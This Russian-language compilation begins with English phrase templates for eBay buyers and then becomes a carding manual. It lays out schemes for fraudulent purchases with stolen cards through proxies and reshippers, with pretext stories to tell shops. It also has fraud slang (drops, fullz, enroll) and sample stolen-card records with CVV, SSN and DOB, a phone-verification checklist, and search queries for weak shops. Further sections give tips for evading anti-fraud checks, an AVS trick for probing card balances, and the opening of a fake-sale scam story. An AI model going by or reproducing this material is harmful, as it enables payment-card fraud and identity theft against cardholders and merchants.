Шаблоны писем и стандартные фразы, используемые припокупках на eBay и интернет - магазинах, на англйском

Рекомендации по составлению писем.
Вежливость не помешает в любых ситуациях. Старайтесь всегда начинать свое сообщение приветствием, а заканчивать прощанием и подписью.
В письме всегда должна быть конкретика, помните, что у людей к которым вы обращаетесь, как правило, вы не единственный клиент. Поэтому всегда указывайте идентификатор товара(ов), которых касается письмо: это может быть номер лота на eBay, внутренний номер товара в интернет — магазине, в крайнем случае просто вставьте стандартный URL — ссылку на товар. В письме после слова товар — item, вы всегда можете вставить номер или ссылку в скобках.
Если ваши познания в английском оставляют желать лучшего — не стоит строить сложные конструкции. В этом случае краткость — ваш конек. Используйте простые фразы.
Неуважение, хамство, грубость, угрозы никогда не приносят пользы. Старайтесь никогда не «сжигать последний мост» оскорблениями, даже в самой сложной и казалось бы безвыходной ситуации. Это не в ваших интересах — ведь все может измениться. На eBay грубость и оскорбления наказуемы, а за угрозы аккаунт пользователя может быть заблокирован.
Постарайтесь чтобы письмо было аргументированным. Не делайте голословных утверждений, заявлений, не выдвигайте необоснованных требований. Все написанное подкрепляйте фактами.

Стандартные фразы:
Уважаемый продавец Dear Seller
Уважаемый / уважаемая Dear Sir / madame
Я выиграл лот(ы). I have won item(s)
Я купил товар(ы). I have bought an item(s)
С наилучшими пожеланиями. Best Regards
Всего хорошего. Kind Regards
Мне очень жаль. I'm really sorry.
Отлично. Great.
Я уже неоднократно совершал покупки на eBay и имею хорошие отзывы в своем профайле, как вы можете убедиться. I have already purchased items on eBay and I have good feedbacks in my profile, as you can see.
Я пытался связаться с вами, однако ответа не получил. I tried to contact with you, but I haven’t got any reply.

Вопросы о приобретаемом товаре:
Прошу вас прислать мне несколько дополнительных фотографий данного товара. Желательно в
хорошем разрешении. I kindly ask you to send me a few additional photos of this item. It is desirable to send photos in high resolution.
Вы могли бы предоставить мне болеё полную информацию относительно данного товара? Could you please give me more information about this item?
Где был приобретен данный товар? Where was this item bought?
Когда был приобретен данный товар? When was this item purchased?
В каком состоянии находится данный товар? What is the state of this item?
Почему вы решили продать этот товар? Why have you decided to sell this item?
В какой стране был произведен этот товар? In what country was this item produced?
Есть ли у вас документ подтверждающий дату и место приобретения данного товара (кассовый чек/счёт)? Do you have a document that confirms the date and the place of this item purchase (cashier’s receipt / bill)?
Есть ли у вас гарантийный талон на данный товар? Можете прислать мне его копию? Do you have a warranty service coupon for this item? Could you please send me the copy of it?
Идёт ли в комплекте диск с программным обеспечением? Do you provide the disk with software?
Какое основное программное обеспечение установлено на данный момент? What basic software is now installed?
Серийный номер устройства? What is the serial number of the device?
Идёт ли в комплекте чехол? Do you provide the case?
Поставляется ли в комплекте комплект креплений? Do you provide the complete set of fastenings?
Поставляется ли в комплекте зарядное устройство? Do you provide a charger?
Пришлите мне пожалуйста фотографии информационной этикетки данного товара, где будет видна страна-производитель / состав ткани / размер / спецификация блока питания / серийный номер. Please, send me the photos of information label of this item, from which I could find out the country-producer / structure of the fabric / size / the power unit specification /serial number.
Была ли данная вещь в стирке или химчистке? Was this item laundered or dry-cleaned?
Не отдавали ли вы это изделие в ателье / мастерскую для ремонта / подгонки по фигуре (росту)? Have you taken this item to the atelier / to the workshop for repair / alteration to the body (height)?
Это изделие из кожи или из кожзаменителя? Is this item made of leather or of leatherette?
Это изделие целиком кожаное или присутствуют вставки из кожзаменителя / ткани? Is this item entirely made of leather or there are insets of leatherette / fabric?
Это изделие имеёт видимые / скрытые дефекты? Does this item have visible / hidden defects?
Вы можете измерить длину стельки? Could you please measure the length of the insole?
Как долго это изделие было в использовании (использовалось)? How long was this item in use (used)?
На сколько вы бы оценили состояние этого изделия по десятибалльной шкале (0 — ужасно, 10 — безупречно)? How would you evaluate condition of this item in ten-point system (0 — terribly, 10 — irreproachably)?
Этот товар абсолютно новый с ярлыками / этикетками / наклейками в упаковке производителя? Is this item absolutely new with tags / labels / PayPalers in manufacturer’s box?
Блок питания данного устройства рассчитан на 110 или 220 вольт? Или же он универсальный 110–220? Is the power unit of this devi с e rated at 110 or 220 volts? Or is it universal 110-220V?
Данное устройство укомплектовано сетевой вилкой европейского или US стандарта? Is this devise supplied with a plug of European or US standard?
Как долго использовалось данное устройство? How long was this device used?

Оплата товара:
Я выиграл следующие лот(ы) (номера лотов #), я прошу выслать мне общий счет для оплаты.
Доставка посредством USPS EMS (USPS Priority, Royal Mail). I have purchased the following item(s): #. I kindly ask you send me general invoice. Delivery via USPS EMS (USPS Priority, Royal Mail).
Я приобрел у вас следующие товар(ы) (номера лотов #), я прошу объединить их в одну посылку и выслать мне общий счет для оплаты. I have purchased the following item(s): #. I kindly ask you to unite them into one parcel and send me general invoice.
Я приобрел у вас товар (номер лота #), я пока не оплачивал его, т.к. планирую также приобрести (номер лота #). Вы можете отсрочить оплату и если я выиграю этот лот (номер лота #) объединить все товары в одну посылку и выслать мне общий счет на оплату? I have purchased an item #, and I have not paid for it yet, because I’m going to purchase another item #. Could you please put off the payment, and if I win the item #, unite all the items into one parcel and send to me total invoice?
К сожалению у меня возникли небольшие затруднения с оплатой, могу ли я попросить об отсрочке платежа на.... дней? Unfortunately, I have some problems with payment, can I ask for a delay for... days?
К сожалению у меня не получается отправить платеж, пришлите мне пожалуйста идентификатор вашего Paypal, чтобы я отправил средства непосредственно со своего аккаунта. Unfortunately, I cannot send the payment. Please, send me the identifier of your Paypal in order that I could send money directly from my account.
Я могу оплатить товар каким-нибудь другим способом кроме Paypal? Is it possible to pay in a different way than Paypal?
Могу я заплатить посредством (международного банковского перевода, Paypal)? Can I pay via (international bank transfer, Paypal)?
Пришлите мне пожалуйста банковские реквизиты. Could you send me please bank account information?
НДС должен быть возвращен на мой Paypal (карточный) счет. The VAT value needs to be refunded to my Paypal (credit card) account.
Я не могу оплатить покупку через Пайпал, т. к. эта онлайновая платежная система не работает с жителями моей страны. I can’t pay for the purchase via Paypal, because this online payment system does not work with citizens of my country.

Доставка. Страховка. Таможня:
Доставка. Delivery.
Страховка. Insurance.
Таможня. Сustoms.
Я заинтересован в покупке Вашего товара(ов), однако вижу, что вы не отправляете заказы в страну, где я проживаю (Россия, Украина). Вы можете сделать для меня исключение и отправить мне товар(ы) посредством ЕМС (Приорити, Ройал Мейл)? I’m interested in purchasing your item(s), but I see that you don’t send them to the countries I live in (Russia, Ukraine). Can you make an exception for me and send me the item(s) via USPS EMS (USPS Priority, Royal Mail)?
Я просил бы вас отправить посылку посредством ЕМС (Приорити, Ройал Мейл). I would like you to send the parcel via USPS EMS (USPS Priority, Royal Mail).
Я заинтересован в покупке вашего товара(ов), однако предлагаемый способ доставки меня не устраивает, т.к. он: I’m interested in purchasing of your item(s), but the way of delivery you suggest isn’t convenient for me because:
слишком дорого. it’s too expensive.
предусматривает высокие таможенные платежи. the customs duties are too high.
посылка будет идти слишком долго. the delivery will take too much time.
слишком не надежен. it’s too unreliable.
Вы можете отправить мне этот товар(ы) в Российскую Федерацию (Украину, Казахстан, Беларусь) посредством EMS (Приорити, Ройал Мейл)? Could you please send this item(s) to Russia (Ukraine, Kazakhstan, Belarus) via USPS EMS (USPS Priority, Royal Mail)?
Я прошу вас качественно упаковать купленный мной товар(ы). Готов оплатить это дополнительно. Please, pack up the purchased item(s) good. I’m ready to pay for it additionally.
Я приобрел у вас товар(ы).... Скажите пожалуйста вы уже отправили посылку? I have purchased next item(s) from you.... Please let me know if you have already sent the parcel.
Сообщите мне пожалуйста полную стоимость включая доставку в Россию (Украину, Казахстан, Беларусь) посредством ЕМС (Приорити, Ройал Мейл) и страховку. Please, let me know the total cost including delivery to Russia (Ukraine, Kazakhstan, Belarus) via USPS EMS (USPS Priority Mail, Royal Mail) and insurance.
Можете назвать дату когда вы отправили посылку? Could you please tell me the date when the parcel was sent?
Пришлите мне пожалуйста номер для отслеживания хода доставки. Please, send me the tracking number.
Я к сожалению до сих пор не получил отправленный мне товар(ы). Unfortunately, I haven’t got sent item(s) yet.
Я хочу инициировать розыск посылки, но для этого мне нужны скан-копии чека об отправке и таможенной декларации CP22/23. I would like to initiate a parcel search, but I need the scan-copies of the cheque of shipment and customs declaration CP22/23.
Прошу вас указать в таможенной декларации следующую стоимость посылки:... $ I kindly ask you to specify in the customs declaration the following value of a parcel:... $
Прошу вас отправить мне этот товар, как «бывший в употреблении» сняв с него все наклейки, ярлыки, ценники. Please, take all the PayPalers, labels, and price tags off and send me the item as "used".
Возможно ли дополнительно застраховать посылку? На сумму.... Is it possible to insure the parcel additionally? To the amount of....
Я до сих пор не получил отправленную посылку. Вы можете инициировать её розыск и получение страхового возмещения? I still haven’t got the sent parcel. Could you please initiate the search and insurance compensation?
Это поможет избежать уплат лишних таможенных платежей. This will help to avoid duties.

Товар не получен / не соответствует описанию. Диспуты. Возвраты:
Вы обещали мне полный (частичный) возврат средств за купленный товар(ы), однако до сих пор не сделали этого. Я могу спросить почему? Когда вы сделаете возврат? You have promised me full (partial) refund of money for item(s) purchased from you, but you have not done it yet. Can I ask you why? When do you do the refund?
Я вынужден оставить вам отрицательный отзыв, т. к. товар(ы) мной до сих пор не получен (полученный товар не соответствует описанию). I have to give you a negative feedback because I haven’t received the item(s) yet (the delivered item doesn’t not correspond with description).
Вы можете гарантировать компенсацию стоимости возврата если полученный мной товар будет не соответствовать описанию? Do you guarantee the compensation of the return cost in case the item doesn’t correspond with description?
Я приобрел этот товар, оплатил его через Paypal, но он до сих пор не получен. I have purchased the item, paid for it via PayPal, but I haven’t received it yet.
Пожалуйста верните мне всю уплаченную сумму, как можно скореё. Please refund me in full asap.
Присланный мне товар не соответствует описанию (сломан), но отправлять его вам обратно очень дорого, я могу рассчитывать на частичный (полный) возврат уплаченных средств на свой Paypal аккаунт? The item delivered to me doesn’t correspond with description (it’s broken), but it’s too expensive to send it back to you. Can I ask for a partial (full) refund of money to my Paypal account?
Товар, который я приобрел у вас нуждается в ремонте. Как мне сообщили в сервисном центре, ремонт обойдется в.... Я могу рассчитывать на частичный возврат средств на сумму ремонта? (частичный возврат на мой Paypal аккаунт)? The item I have purchased from you needs to be repaired. In the service centre I was told that repair will cost.... Can I ask for partial refund of money to the sum of the repair cost (partial refund of money to my Paypal account)?
В посылке оказался не тот товар, который я приобрел. In the parcel there was not the item I had purchased.
К сожалению я вынужден перевести диспут в жалобу. Unfortunately, I have to turn the dispute into claim.
Вы принимаете возврат товара из России (Украины)? Do you accept return shipping from Russia (Ukraine)?


Используем EU материал

Схемы работы:

Вариант 1. Шоп дает нам выставить реальный BILLING ADDRESS держателя карты.
В таком случае мы выставляем BILLING ADDRESS с карты, в SHIPPING ADDRESS ставим адрес
посредника. Имена ставим все с посредника.
ˆ SOCKS 5 ставим под BILLING ADDRESS.
ˆ Советую начинать с прелюдий. Если есть live-chat(support) то пишем туда, если его нету - то на почту.
История простая : Вы нашли товар,которого нету у вас в стране и хотите купить его у них. При этом спрашивайте за интернациональную доставку(они откажут) и в том же сообщении спрашивайте возможность альтернативной доставки на посредника в США. Обязательно пишите уважительно, указывая заранеё свой ИМЯ, чтобы будущий заказ они сразу ассоциировали с вами. Работает на УРА со средней руки шопами

Вариант 2. Шоп не дает нам выставить реальный BILLING ADDRESS держателя карты.
В таком случае мы выставляем BILLING ADDRESS с посредника, и SHIPPING ADDRESS соответственно так же с посредника.
ˆ SOCSK 5 под BILLING ADDRESS(посредник)
ˆ Советую начинать с прелюдий. Если есть live-chat(support) то пишем туда, если его нету - то на почту.
История простая : Вы сейчас находитесь в командировке в Штатах и хотели бы сделать заказ. Сами вы из ***** и карта выпущена там же. Уже очень много магазинов отказало, а я ищу подарок своему
партнеру(другу, брату, подруге, девушке). Работает на УРА со средней руки шопами

Материал у которого сверяется BILLING ADDRESS:
MX/BR/USA/Canada/NZ/AU/UK/HK/

По варианту 2.
Ещё можно указать, что у вас прописан интернациональный биллинг адрес.


Полностью настроенная и готовая к работе виртуальная машина. VMware 10

И так, для тех кому лень настраивать виртуальную машину, или просто по каким то причинам не могут этого сделать, я выкладываю свою, полностью настроенную для работы виртуальную машину, в ней есть всё, что нужно для нашей не легкой профессии.
1. Скачиваем c официального сайта VMware 10 https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/10_0
2. Разархивируем.
3. Заходим в VMware. Файл - Открыть - ищем куда разархивировали.
4. Вот и всё, юзаем, проверяем.


Немного терминологии вещевого кардинга

Понимание и смысл кредитной карты и работы по ней.
Допустим у человека нет денег, а ему очень нужна определенная сумма для покупки чего-либо.
Подумав и решив, он обращается в любое из отделение банков, и представив банку всю необходимую информацию, подписав множество различных бумаг, получает кредитную карту, определенного типа, с установленной по ней ограниченной суммой кредита! Получив данную карту, владелец автоматически становится КАРТХОЛДЕРОМ!
Далее термины, присущие этому:
Credit line - сумма кредитной линии, на которую банк дает одобрение Кардхолдеру, для покупки того или иного товара. То есть обычный кредит. Принцип работы: берешь сейчас, платишь потом. При покупке того или иного товара неоднократно, сумма кредитной линии увеличивается.
Current Balance - сумма использованного кредита, которую необходимо будет выплатить банку.
Вычитывается из Credit line.
Available Credit - доступная сумма кредита, то есть сумма которую еще можно потратить.
Кредитная карта или кредит как правило выдается на год или несколько лет. Поэтому на карте обозначено:
Expiration date - месяц и год заключения договора с банком и дата окончания. Например 10/2023.
Каждая кредитная карта имеёт уникальный номер.
Card Number - номер, чаще всего 16-ти значный (основа Visa, Mastercard). Реже встречаются 13-ти значные. У American Express 15-ти значный номер.
Visa и Mastercard/Eurocard - международные платежные системы (МПС), которые следят за использованием данных карт, оповещают картхолдеров по всем движениям по картам, а также присваивают определеннные привелегии. У Visa card - номера карты начинаются на 4, у Mastercard на 5, American Express на 3 (это основные 3 вида, с которыми нам приходится работать).
При покупках в шопах часто спрашивают документ, удостоверяющий личность владельца карты, делается для того чтобы никто иной не смог расплатиться данной картой (будь она похищена или утеряна), на лицевой стороне карты пишут
Cardholder's Name - имя и фамилия держателя карты. Карта - собственность банка. Клиент лишь является её держателем.
А чтобы обладатели фотографической памяти, увидев все реквизиты карты в руках владельца, не могли потом ничего купить по телефону или в онлайне по чужой карте, на её обратной стороне пишется CVC2 или CVV2 - три(четыре) секретных цифры мелким шрифтом. У Mastercard это называется Card Validation Code, у Visa - Card Verification Value.
Для того, чтобы Кардхолдер знал сколько он потратил денег или внес на счет, банк высылает ему
Statement - ежемесячный детализированый отчет по всем движениях денег на карте, где построчно указаны стоимость товара, оказанных услуг, налога на то или иное развлечение и т.д.
Там имеются такие важные для банка и нелюбимые кардхолдерами поля, как:
Minimum Payment Due - сумма ежемесячного платежа по кредиту, вычисляемая и пересчитываемая каждый месяц. Общая сумма долга делится на оставшиеся периоды, до конца договора, начисляются
проценты, и все это кардхолдер оплачивает установленными платежами ежемесячно.
Payment Due Date - дата планового платежа по кредиту, по которой он оплачивает свой Minimum
Payment Due, иначе банк насчитывает штрафные проценты за неуплату (ПЕНЯ)
LATE FEE - посуточный штраф за опоздание платежа(по нашему ПЕНЯ).
Из лимитов в стейтменте можно еще увидеть:
Cash Advance Limit - максимальная сумма, которую можно получить по карте деньгами в банкомате в общем (не за один раз). Единоразовый, а точнеё суточный лимит по CA чаще всего бывает $500. Но в
разных банках он может быть больше или меньше, все зависит от типа карты.
Термины в различных банках могут отличаться от вышеприведенных. Тема создана для того, чтобы не перепутать, допустим представленный баланс к оплате с лимитом на растраты. Кредитная карта
полностью отличается от своего собрата иного типа карт - дебетовой. Принцип дебетовой карты - сколько положил на счет в банке, столько и сможешь потратить, без установленных кредитных лимитов.

Слэнг:
Картон (картошка, карта, СС) - все реквизиты карты, необходимые для оплаты через интернет, номер,
ФИ картхолдера, адрес, номер телефона, ДОБ, CVV2/CVC2.
Пластик - собственно карта, только не в руках владельца, а дубликат, в чужих.
ПИН (PIN) - четырехзначное число, служащеё паролем для доступа к карте через банкомат и иногда через сайт банка.
Шоп - сайт онлайн-магазина, где по карте можно заказать товар.
Шоппинг - купить тот или иной товар в шопе.
Товар(stuff) - выбраный нами това в шопе.
billing address, биллинг - адрес проживания кардхолдера, куда отправляется Statement.
billing phone - телефон холдера, по которому звонит банк или шоп, в случае каких либо вопросов.
shipping address, шиппинг - адрес, куда магазин должен отправить заказанный товар. Для крупных покупок требуется, чтобы он совпадал с биллинг адресом или был вписан в банке, в свойства карты, именно как шиппинг, иначе могут возникнуть проблемы.
траблы - trouble, проблема. Траблы с шопом решаются:
прозвоном - т.е. звонком в магазин для подтверждения покупки, биллинг и шиппинг адресов и всяческой своей лояльности. Если траблы с английским или немецким языком, можно заказать услуги прозвонщика, который все это профессионально (по возможности) сделает. Прозвонщику нужно сказать всю информацию, которую потребует шоп при разговоре. В разных шопах она разная, но в основном спрашивают:
ордер (order) - номер заказа, сделанного на сайте. О чем договорились прозвонщик и шоп, можно узнать не только со слов прозвонщика, но и на сайте магазина через некоторое время. У ордера могут быть разные статусы в зависимости от магазина и используемого в нем софта. До прозвона дело может даже не дойти, если использовать:
энролл (enroll) - доступ к данным карты через сайт банка. Опять же, в каждом банке своя система. В некоторых может понадобиться только:
MMN (mother's maiden name) - девичья фамилией матери.
DOB (date of birth) - датой рождения. Где-то только
SSN (social secure number) - индивидуальный номер налогоплательшика. Где-то комбинация вышеперечисленных с номером ПИН или даже с
DL (driver's license) - номером водительских прав. Обычно это секретная информация. Но ведь существует
пробив - нахождение SSN, DOB, MMN, DL по различным базам данных. Пробивщик за денежку найдет данные почти на любого американца. Если время не позволяет озадачиваться пробивом или пробивщики все попропадали в оффлайн, можно купить
фуллку (full info) - все данные кардхолдера, достаточные для регистрации энролла на сайте банка. Заэнроллив там карту, можно изменить биллинг телефон на свой, а биллиг адрес на адрес своего или чужого
дропа - человека, согласного принять и переправить куда скажут купленный товар. Делает он это за деньги. Вообще этой темой занимается:
дроповод - специалист по промыванию мозгов у дропов, чтобы они согласились работать с карженным товаром. Но бывают не только
разводные дропы - "развели как лоха", но и неразводные дропы. Это партнёры, которые знают, чем занимаются и активно содействуют. Ищут съемные квартиры, шлют сканы документов при необходимости, могут прозвонить шоп и т.д. Требуют себе большую долю, часто кидают, но работать с ними проще конечно.
Так вот насчет ордера. Самый необходимый для нас статус это:
shipped - отправлено на шиппинг адрес. Если дроповод надежный и дропы у него стабильные, то это
уже 80 процентов успеха, что товар попадет к вам. Только нужно сообщить дроповоду
трэк (tracking number) - уникальный номер посылки в почтово-курьерской службе, например в DHL, UPS или FedEx. Он появляется на сайте шопа в деталях ордера после отправки. По этому номеру можно отслеживать на сайте, выбранном для отправки службы - статус посылки, где она находится и, что с ней происходит. Как только статус станет
delivered - доставлено, ответственность за товар переходит к дроповоду и в ближайшие дни он заплатит за товар (по идеё). Кстати, следите в каком городе доставлено. А то бывает, что посылка обратно в шоп возвращается и delivered получается слегка не там, где ожидалось.
Из негативных терминов canceled, declined, suspended, FBI, USSS, дроповод кинул. Желаю всем никогда с ними не сталкиваться, ну или хотя бы с минимальными потерями.


Словарь для начинающих!

По ходу занятий форум тратит довольно много времени на повторение и расшифровку одного и того же, поэтому я решил написать небольшой словарик с основными сокращениями и понятиями.

CC - картон - картошка - кредитная карта, информация о кредитной карте
Пример CC:
4270204034949890|1223|731|Tim Stone|United States|Florida|Napels|33212|182 S Terra St|(305) 512-1115|[email protected]

4270204034949890 - номер кредитной карты (16 цифр)
1223 - дата истечения срока действия карты (expiration date)
731 - защитный код (CVV2)
Tim Stone - имя и фамилия владельца карты
United States - страна проживания владельца карты
Florida - штат проживания владельца карты
Napels - город проживания владельца карты
33212 - почтовый индекс (Zip code, Postal code) владельца карты
182 S Terra St - улица и дом владельца карты
(305) 512-1115 - номер телефона владельца карты (бывает не всегда)
[email protected] - почта владельца карты (бывает не всегда)

Для определения какого типа у вас карта (VISA, MC, AMEX, MAESTRO), необходимо знать:
Если номер карты начинается:
на 3 - American Express
на 4 - VISA
на 5 - MasterCard
на 6 - Maestro

Так же необходимо помнить:
У MasterCard и у VISA номер карты состоит из 16 цифр, у American Express из 15.
Защитный код (CVV2) у MASTERCARD и у VISA состоит из трёх цифр, у American Express из четырех.
Не во всех CC штат может быть написан полностью, очень часто он обозначен двумя буквами, примеры: IA, AR, DE и т.д. - чтобы узнать штат, пользуйтесь таблицей http://iec.kiev.ua/us-states.shtml.
Если в CC адрес написан криво или отсутствует, пользуйтесь гуглом и ищите его по ZIP коду.
Баланс на обычной CC никогда не известен, однако зная её уровень (Gold, Platinum и т.д.), можно его предполагать.

Картхолдер - законный владелец карты
Шоп - онлайн магазин
Шип - процесс покупки товара в онлайн магазине используя информацию о кредитной карте
Дроп - человек на которого делаете шип (если не на себя)
Селлер - продавец материала (или иного товара) необходимого кардеру
Вбив - ввод инфы о карте в магазин, при оплате товара
Стафф - товар

Full СС - Фулка - полная информация о кредитной карте, включая информацию о владельце карты, а именно SSN, DOB, MMN

SSN - Social Security number (номер социального страхования картхолдера)
DOB - date of birth (дата рождения картхолдера)
MMN - mother's maiden name (девичья фамилия матери картхолдера, бывает не всегда)

Пример Фулки:
Jessica Bows 4727388374652983 0816 931 16353 Collins Ave FL 33180 United States 786-534-5342
DOB 10.09.1980
SSN 5546-256-3545
Так же еще может присутствовать инфа что и на обычной CC, типа почты, телефона и т.д.
Для чего нужна эта инфа и для чего нужны Фулки:
Они нужны для того что бы сделать Энролл - создать онлайн аккаунт в банке.
Ролят карты как правило что бы узнать баланс карты и сменить её биллинг адрес.
Для чего это нужно:
1) С балансом понятно
2) Не все магазины шлют на отличный от биллинга, шиппинг адрес. В таком случае мы можем поменять биллинг адрес, на шиппинг адрес дропа.

Дополнительные защиты кредитных карт:
VBV - Verified by Visa - Суть системы в том, что при оплате товаров или услуг в интернете необходимо ввести дополнительный проверочный код, который владелец карты получает от банка, выпустившего карту.
У MasterCard есть аналогичная защита - SECURITY CODE.
У American Express - ничего подобного нет!

Дополнительная информация о кредитной карте:
Банк Эмитент - банк выдавший карту и контролирующий её
Бин - первые шесть цифр номера карты, по которым можно определить:
Банк эмитент, уровень карты, тип карты и другую инфу!

Как это проверить:
1. Заходим на сайт www.bindb.com (аналогов много, пользуйтесь гуглом)
2. Нажимаем Bin Search (вверху)
3. Вводим Бин и капчу, после ввода нажимаем Search

Должна появиться информация такого плана:
Bin: 421766
Card Brand: VISA
Issuing Bank: BANK OF AMERICA NATIONAL ASSOCIATION
Card Type: DEBIT
Card Level: PLATINUM
Iso Country Name: UNITED STATES
Iso Country A2: US
Iso Country A3: USA
Iso Country Number: 840


[ПРОЗВОН] Какие данные могут спросить или ШАБЛОН для прозвона

Решил выложить список того, что может спросить шоп при прозвоне.
Желательно подготовить все эти данные до прозвона чтобы иметь возможность быстро отвечать.
Если пользуетесь услугами прозвонщика, то ему желательно сообщить максимально много данных.
Данные, необходимы для прозвона:
1. ФИО холдера
2. Мейл холдера
3. Данные сс (номер, эксп достаточно)
4. Билинг
5. Шипинг
6. ССН + ДОБ !!!(ПОСЧИТАЙТЕ И УКАЖИТЕ СКОЛЬКО ХОЛДЕРУ ЛЕТ) - бывает, что спрашивают.
7. Сайт куда вбивал
8. Номер ордера
9. число и варемя ордера
10. Название товара !!!(КРАТКОЕ ОПИСАНИЕ ТОВАРА: ЧТО ЭТО в двух словах)
11. Сумма вбива
12. Номер куда звонить
13. Номер с которого звонить
14. Название банка (на всякий, иногда спрашивают)
15. Телефон службы поддержки банка (иногда просят продиктовать телефон, который написан сзади на сс)
16. Письмо с конторы, куда звоним (если есть)
17. Причина звонка
18. Цель звонка

Поиск шопов для Вбива

Нам надо:
1. Поисковик YAHOO, GOOGLE, AOL и т.д
2. Правильные запросы:
+ Знак Плюс заставит Google обязательно учесть слово, перед которым он стоит, при обработке запроса. Для правильной фильтрации запроса,советую писать запрос в виде shop+e-gift+pay visa, даст запрос магазин с е-гифтом и оплатой Виза.
inurl: Аналогичен оператору allinurl, только производит поиск в адресах страниц одного слова. Если подставить следующий запрос inurl: - указывает, что искомая нами фраза должна стоят в ссылке/линке/url
Т.е clothes shop+ inurl:e-gift - даст наm писок шопов, у которыx есть фраза e-gift в ссылке
Выдаст шопы xxx.com/e-gift
«» Двойные кавычки позволяют найти только то выражение, которое в них содержится.
«clothes shop egift»
site: Ограничивает поиск слов, которые стоят перед оператором, указанным доменом или сайтом.clothes shop site:.bz - 6удут выданы запросы в.BZ домене.
Запросы можно соеденять в 1 строку OR Логическое «ИЛИ» позволяет найти несколько вариантов слов или выражений. Ему соответствует символ «|».men+clothes inurl:egift OR e-gift OR giftcard site:.com - мужская одежда, поиск по ссылке OR (указание синонимов слова и иx поиск) и поиск в определенном домене
Так же советую для новичков использовать http://pr-cy.ru, для определения серьёзности шопа.
PR должен 6ыть меньше двух.


Обозначение US штатов и их часовые пояса

Al - alabama (-6gmt)
ak - alaska (-9gmt)
ar - arkansas (-6gmt)
az - arizona (-7gmt - зимой) (-8gmt - летом)
ca - california (-8gmt)
co - colorado (-7gmt)
ct - connecticut (-5gmt)
dc - district of columbia (-5gmt)
de - delaware (-5gmt)
fl - florida (-5gmt)
ga - georgia (-5gmt)
hi - hawaii (-10gmt - зимой) (-11gmt - летом)
id - idaho (-7gmt)
ia - iowa (-6gmt)
il - illinois (-6gmt)
in - indiana (-5gmt - зимой) (-6gmt - летом))
ks - kansas (-6gmt)/(-7gmt)
ky - kentucky (-5gmt)
la - louisiana (-6gmt)
ma - massachusetts (-5gmt)
md - maryland (-5gmt)
me - maine (-5gmt)
mi - michigan (-5gmt)
mo - missouri (-6gmt)
mn - minnesota (-6gmt)
ms - mississippi (-6gmt)
mt - montana (-7gmt)
nc - north carolina (-5gmt)
nd - north dakota (-6gmt)/(-7gmt)
ne - nebraska (-6gmt)/(-7gmt)
nh - new hampshire (-5gmt)
nj - new jersey (-5gmt)
nm - new mexico (-7gmt)
ny - new york (-5gmt)
nv - nevada (-8gmt)
oh - ohio (-5gmt)
ok - oklahoma (-6gmt)
or - oregon (-8gmt)
pa - pennsylvania (-5gmt)
pr - puerto rico
ri - rhode island (-5gmt)
sc - south carolina (-5gmt)
sd - south dakota (-6gmt)/(-7gmt)
tn - tennessee (-6gmt)
tx - texas (-6gmt)
ut - utah (-7gmt)
va - virginia (-5gmt)
vt - vermont (-5gmt)
wa - washington (-8gmt)
wi - wisconsin (-6gmt)
wv - west virginia (-5gmt)
wy - wyoming (-7gmt)


Вбив как искусство

Сегодня будем повышать % удачного вбива в шопы.

Для этого надо:
1. Переходить в ШОПЫ через любые поисковые системы ( можно вбивать в запрос просто имя домена без зоны и так переходить)
2. Перед покупкой пошататься по корзине с однотипным товаром минут 15
3. Во время вбива деталей заказа, НЕ КОПИРОВАТЬ, писать в ручную, допускать ошибки, стирать и писать заново.
4. При вводе СС писать все в ручную, не торопясь
5. Проверять соксы на черный список http://whoer.net

Сегодня произвел тесты на 3 крупныx шопаx, которые не выдали мне предмет покупки, при не соблюдении этих пунктов.
Вариант проверка баланса на еу сс, который вам нужен через мерч Authorize.Net (не 100% варик)
Все мы знаем этот мерч, с одной стороны он простой с другой противный А именно когда в настройках шопа при вбиве еу сс вылазит ошибка AVS (Address Verification System - проверка биллинг адреса), встречается очень много таких шопов где эта проверка стоит.
По моим наблюдениям когда вбиваешь еу в такой шоп с этим мерчем вылазит часто в основном 2 ошибки:
1) Это Decline
2) Это ошибка AVS

Так вот, может конечно я и не прав, так как я не давно в этой сфере, но оно нам на руку - если я прав.
Немного истории - так скажем только доперло, при недавних вбивах.
Когда то давно я нашел шоп где были гифты на фотики и т.д., как оказалось я сделал гифты на аренду оборудования, вообщем лоханулся.. но пошарив по шопу я увидел что они продают б.у. фотики и оборудование. Тут же пришла мысль воспользоваться этими гифтами чтобы взять хотя бы б.у. фотик.
Вообщем дошел я до оплату применил гифт сумма списалась, не поле оплата сс осталась, уточнил этот вопрос у Шефа, он сказал что попробуй виртуалку киви туда вбить. Я попробовал и получилось что пришла смс на номер киви что списался 1 бакс, но при этом на сайте вылезла ошибка AVS и буквально через несколько минут пришла еще одна смс что этот бакс вернулся на карту.

Так вот подходим к самой сути:
Берём такой шоп (где вылазит такая ошибка AVS) и набиваем товарняка в корзину на сумму которая вам нужна и получаем результат, либо ошибку AVS (значит сумму которую вы набрали есть на карте), либо Decline (соответственно такой суммы нет на карте).
Таким простым способом мы можем узнать нужный баланс на еу сс!
P.S. Это проверено частично мной, т.к. была виртуалка киви и система работы банков мне не известна, но я так думаю. Возможно сумму блочет банк и на продолжительное время, но мне кажется это очень кратковременный холд денежных средств, т.к. транза полностью не прошла. Т.е. думаю вбивать можно после такого через 30 минут - 1 час, естественно если холдер не спалит. Так же такой метод поможет бить в те мерчи которые не сразу снимают деньги со счета сс, а при ручной обработке.
У кого есть какие мысли по этому поводу, просьба отписать ниже. Это мой вывод и возможно он верный.


[История] Как я продавал воздух

Так как я любитель писанины всякой, расскажу вам историю, как продавал воздух.
Сразу хочу сказать, что данное дело попадает под 159 статью УК РФ и настоятельно не советую проворачивать данную схему.
Что ж, начнем.
У всех нас в жизни бывают разные ситуации. Моя ситуация заключалась в том, что мне нужны были деньги на оплату учебы. Так что дело сделал благое...шутка.
Происходило это все года 3-4 назад, тогда о мошенничестве в интернете еще не было таких громких предостережений и статей.
Возникла ситуация - срочно нужно 50 тысяч. Срок - 2 недели максимум (тянул до последнего, думал заработать успею). Не успел. Отчаяние, депрессия, взять не у кого, заработать не успею. Начал думать головой.
Прекрасно понимал, что 90-ые далеко позади и тупо украсть не получится, так же понимал, что белыми путями я этих денег не получу. Вариант пришел в голову за 30 минут. Было решено "продать воздух" в интернете и получить нужную сумму. Дабы минимизировать риски и сохранить нервы, решил что надо сделать это в один подход - то есть продать одну вещь. Пробежавшись по сайтам объявлений, искомый товар был найден. Что это было, говорить не буду, ибо сами понимаете. Товар был рыночной стоимостью около 80-120 т.р., весом в районе 130 кг и довольно габаритный.
